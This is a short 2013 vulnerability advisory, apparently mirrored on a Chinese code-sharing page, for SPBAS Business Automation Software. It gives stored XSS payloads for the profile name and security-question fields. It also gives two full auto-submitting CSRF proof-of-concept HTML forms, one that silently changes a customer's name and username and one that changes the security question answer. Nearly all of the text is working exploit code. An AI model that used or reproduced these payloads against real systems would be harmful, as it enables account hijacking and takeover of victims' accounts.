扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
# SPBAS Business Automation Software- XSS & CSRF Vulnerability # Date: 16 June 2013 # Author: Christy Philip Mathew - www.offcon.org # Vendor or Software Link: http://www.spbas.com # Version: 2012 *1.XSS Vulnerability* (a) Client Area -> My Info -> Update the first name and last name to john"><img src=x onerror=prompt(0);> (b) Update the security question to john"><img src=x onerror=prompt(0);> *2.Cross Site Request Forgery* (a) Change Customer Information <html> <body onload=document.forms[0].submit();> <form action="http://website.com/customers/index.php" method="POST"> <input type="hidden" name="task" value="my_account" /> <input type="hidden" name="tab" value="my_info" /> <input type="hidden" name="update_my_info" value="y" /> <input type="hidden" name="first_name" value="hacked" /> <input type="hidden" name="last_name" value="hacked" /> <input type="hidden" name="username" value="hacked" /> <input type="hidden" name="form_submission" value="Save Changes" /> <input type="submit" value="Submit form" /> </form> </body> </html> (b) Change Security Question Answer <html> <body onload=document.forms[0].submit();> <form action="http://website.com/customers/index.php" method="POST"> <input type="hidden" name="task" value="my_account" /> <input type="hidden" name="tab" value="security_question" /> <input type="hidden" name="change_security_question" value="y" /> <input type="hidden" name="question" value="1" /> <input type="hidden" name="answer" value="test" /> <input type="hidden" name="form_submission" value="Save Changes" /> <input type="submit" value="Submit form" /> </form> </body> </html> |
体验盒子
